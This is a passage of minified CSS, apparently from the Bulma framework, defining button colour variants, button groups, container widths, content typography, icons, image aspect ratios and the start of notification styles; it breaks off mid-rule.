.button.is-light{background-color:#f5f5f5;border-color:transparent;box-shadow:none}.button.is-light.is-inverted{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-hovered,.button.is-light.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined.is-focused,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined:hover{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.button.is-light.is-outlined.is-loading::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-outlined.is-loading.is-focused::after,.button.is-light.is-outlined.is-loading.is-hovered::after,.button.is-light.is-outlined.is-loading:focus::after,.button.is-light.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-light.is-inverted.is-outlined.is-focused,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-light.is-inverted.is-outlined.is-loading:focus::after,.button.is-light.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark.is-hovered,.button.is-dark:hover{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark.is-focused,.button.is-dark:focus{border-color:transparent;color:#fff}.button.is-dark.is-focused:not(:active),.button.is-dark:focus:not(:active){box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.button.is-dark.is-active,.button.is-dark:active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:transparent;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-hovered,.button.is-dark.is-inverted:hover{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined.is-focused,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined:hover{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading.is-focused::after,.button.is-dark.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-outlined.is-loading:focus::after,.button.is-dark.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined.is-focused,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined:hover{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-inverted.is-outlined.is-loading:focus::after,.button.is-dark.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary.is-hovered,.button.is-primary:hover{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary.is-focused,.button.is-primary:focus{border-color:transparent;color:#fff}.button.is-primary.is-focused:not(:active),.button.is-primary:focus:not(:active){box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.button.is-primary.is-active,.button.is-primary:active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:transparent;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-hovered,.button.is-primary.is-inverted:hover{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined.is-focused,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined:hover{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading.is-focused::after,.button.is-primary.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-outlined.is-loading:focus::after,.button.is-primary.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined.is-focused,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined:hover{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-inverted.is-outlined.is-loading:focus::after,.button.is-primary.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light.is-hovered,.button.is-primary.is-light:hover{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light.is-active,.button.is-primary.is-light:active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#485fc7;border-color:transparent;color:#fff}.button.is-link.is-hovered,.button.is-link:hover{background-color:#3e56c4;border-color:transparent;color:#fff}.button.is-link.is-focused,.button.is-link:focus{border-color:transparent;color:#fff}.button.is-link.is-focused:not(:active),.button.is-link:focus:not(:active){box-shadow:0 0 0 .125em rgba(72,95,199,.25)}.button.is-link.is-active,.button.is-link:active{background-color:#3a51bb;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#485fc7;border-color:transparent;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-hovered,.button.is-link.is-inverted:hover{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#485fc7}.button.is-link.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;color:#485fc7}.button.is-link.is-outlined.is-focused,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined:hover{background-color:#485fc7;border-color:#485fc7;color:#fff}.button.is-link.is-outlined.is-loading::after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-outlined.is-loading.is-focused::after,.button.is-link.is-outlined.is-loading.is-hovered::after,.button.is-link.is-outlined.is-loading:focus::after,.button.is-link.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;box-shadow:none;color:#485fc7}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined.is-focused,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined:hover{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-link.is-inverted.is-outlined.is-loading:focus::after,.button.is-link.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eff1fa;color:#3850b7}.button.is-link.is-light.is-hovered,.button.is-link.is-light:hover{background-color:#e6e9f7;border-color:transparent;color:#3850b7}.button.is-link.is-light.is-active,.button.is-link.is-light:active{background-color:#dce0f4;border-color:transparent;color:#3850b7}.button.is-info{background-color:#3e8ed0;border-color:transparent;color:#fff}.button.is-info.is-hovered,.button.is-info:hover{background-color:#3488ce;border-color:transparent;color:#fff}.button.is-info.is-focused,.button.is-info:focus{border-color:transparent;color:#fff}.button.is-info.is-focused:not(:active),.button.is-info:focus:not(:active){box-shadow:0 0 0 .125em rgba(62,142,208,.25)}.button.is-info.is-active,.button.is-info:active{background-color:#3082c5;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3e8ed0;border-color:transparent;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-hovered,.button.is-info.is-inverted:hover{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3e8ed0}.button.is-info.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;color:#3e8ed0}.button.is-info.is-outlined.is-focused,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined:hover{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.button.is-info.is-outlined.is-loading::after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-outlined.is-loading.is-focused::after,.button.is-info.is-outlined.is-loading.is-hovered::after,.button.is-info.is-outlined.is-loading:focus::after,.button.is-info.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;box-shadow:none;color:#3e8ed0}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined.is-focused,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined:hover{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-info.is-inverted.is-outlined.is-loading:focus::after,.button.is-info.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eff5fb;color:#296fa8}.button.is-info.is-light.is-hovered,.button.is-info.is-light:hover{background-color:#e4eff9;border-color:transparent;color:#296fa8}.button.is-info.is-light.is-active,.button.is-info.is-light:active{background-color:#dae9f6;border-color:transparent;color:#296fa8}.button.is-success{background-color:#48c78e;border-color:transparent;color:#fff}.button.is-success.is-hovered,.button.is-success:hover{background-color:#3ec487;border-color:transparent;color:#fff}.button.is-success.is-focused,.button.is-success:focus{border-color:transparent;color:#fff}.button.is-success.is-focused:not(:active),.button.is-success:focus:not(:active){box-shadow:0 0 0 .125em rgba(72,199,142,.25)}.button.is-success.is-active,.button.is-success:active{background-color:#3abb81;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c78e;border-color:transparent;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-hovered,.button.is-success.is-inverted:hover{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c78e}.button.is-success.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;color:#48c78e}.button.is-success.is-outlined.is-focused,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined:hover{background-color:#48c78e;border-color:#48c78e;color:#fff}.button.is-success.is-outlined.is-loading::after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-outlined.is-loading.is-focused::after,.button.is-success.is-outlined.is-loading.is-hovered::after,.button.is-success.is-outlined.is-loading:focus::after,.button.is-success.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;box-shadow:none;color:#48c78e}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined.is-focused,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined:hover{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-success.is-inverted.is-outlined.is-loading:focus::after,.button.is-success.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf5;color:#257953}.button.is-success.is-light.is-hovered,.button.is-success.is-light:hover{background-color:#e6f7ef;border-color:transparent;color:#257953}.button.is-success.is-light.is-active,.button.is-success.is-light:active{background-color:#dcf4e9;border-color:transparent;color:#257953}.button.is-warning{background-color:#ffe08a;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-hovered,.button.is-warning:hover{background-color:#ffdc7d;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused,.button.is-warning:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused:not(:active),.button.is-warning:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,224,138,.25)}.button.is-warning.is-active,.button.is-warning:active{background-color:#ffd970;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffe08a;border-color:transparent;box-shadow:none}.button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);color:#ffe08a}.button.is-warning.is-inverted.is-hovered,.button.is-warning.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#ffe08a}.button.is-warning.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;color:#ffe08a}.button.is-warning.is-outlined.is-focused,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined:hover{background-color:#ffe08a;border-color:#ffe08a;color:rgba(0,0,0,.7)}.button.is-warning.is-outlined.is-loading::after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-outlined.is-loading.is-focused::after,.button.is-warning.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-outlined.is-loading:focus::after,.button.is-warning.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;box-shadow:none;color:#ffe08a}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-warning.is-inverted.is-outlined.is-focused,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#ffe08a}.button.is-warning.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-inverted.is-outlined.is-loading:focus::after,.button.is-warning.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-warning.is-light{background-color:#fffaeb;color:#946c00}.button.is-warning.is-light.is-hovered,.button.is-warning.is-light:hover{background-color:#fff6de;border-color:transparent;color:#946c00}.button.is-warning.is-light.is-active,.button.is-warning.is-light:active{background-color:#fff3d1;border-color:transparent;color:#946c00}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger.is-hovered,.button.is-danger:hover{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger.is-focused,.button.is-danger:focus{border-color:transparent;color:#fff}.button.is-danger.is-focused:not(:active),.button.is-danger:focus:not(:active){box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.button.is-danger.is-active,.button.is-danger:active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:transparent;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-hovered,.button.is-danger.is-inverted:hover{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined.is-focused,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined:hover{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading.is-focused::after,.button.is-danger.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-outlined.is-loading:focus::after,.button.is-danger.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined.is-focused,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined:hover{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-inverted.is-outlined.is-loading:focus::after,.button.is-danger.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light.is-hovered,.button.is-danger.is-light:hover{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light.is-active,.button.is-danger.is-light:active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{font-size:.75rem}.button.is-small:not(.is-rounded){border-radius:2px}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading::after{position:absolute;left:calc(50% - (1em * .5));top:calc(50% - (1em * .5));position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:9999px;padding-left:calc(1em + .25em);padding-right:calc(1em + .25em)}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){font-size:.75rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large):not(.is-rounded){border-radius:2px}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button.is-hovered,.buttons.has-addons .button:hover{z-index:2}.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-focused,.buttons.has-addons .button.is-selected,.buttons.has-addons .button:active,.buttons.has-addons .button:focus{z-index:3}.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button.is-selected:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button:focus:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none!important;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width:1024px){.container{max-width:960px}}@media screen and (max-width:1215px){.container.is-widescreen:not(.is-max-desktop){max-width:1152px}}@media screen and (max-width:1407px){.container.is-fullhd:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}@media screen and (min-width:1216px){.container:not(.is-max-desktop){max-width:1152px}}@media screen and (min-width:1408px){.container:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}.content li+li{margin-top:.25em}.content blockquote:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content p:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child),.content ul:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sub,.content sup{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:inherit}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-normal{font-size:1rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.icon-text{align-items:flex-start;color:inherit;display:inline-flex;flex-wrap:wrap;line-height:1.5rem;vertical-align:top}.icon-text .icon{flex-grow:0;flex-shrink:0}.icon-text .icon:not(:last-child){margin-right:.25em}.icon-text .icon:not(:first-child){margin-left:.25em}div.icon-text{display:flex}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:9999px}.image.is-fullwidth{width:100%}.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square img{height:100%;width:100%}.image.is-1by1,.image.is-square{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;position:relative;padding:1.25rem 2.5rem 1.25rem 1.5rem}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:#fff}.notification pre code{background:0 0}.notification>.delete{right:.5rem;position:absolute;top:.5rem}.notification .content,.notification .subtitle,.notification 